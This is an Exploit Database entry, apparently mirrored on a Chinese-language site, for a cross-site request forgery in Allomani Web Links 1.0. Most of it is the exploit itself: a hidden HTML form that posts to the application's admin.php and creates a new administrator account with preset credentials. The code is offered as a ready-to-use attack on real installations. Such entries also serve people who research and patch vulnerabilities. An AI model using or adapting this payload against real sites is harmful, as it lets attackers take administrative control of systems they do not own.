Allomani Web Links 1.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 8 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2011-04-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17094/

• Web Links 1.0 XSRF Vulnerability (Add Admin)
  ====================================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Script : http://allomani.com/en/weblinks_script.html
  ####################################################################
  
  ===[ Exploit ]===
  
  <form method="POST" name="form0" action="http://localhost/Web Links/admin.php">
  <input type="hidden" name="action" value="adduserok"/>
  <input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
  <input type="hidden" name="username" value="webadmin"/>
  <input type="hidden" name="password" value="123456"/>
  <input type="hidden" name="email" value="Example@hotmail.com"/>
  <input type="hidden" name="group_id" value="1"/>
  <input type="hidden" name="useraddbutton" value="Add"/>
  </form>
  
  </body>
  </html>
  ####################################################################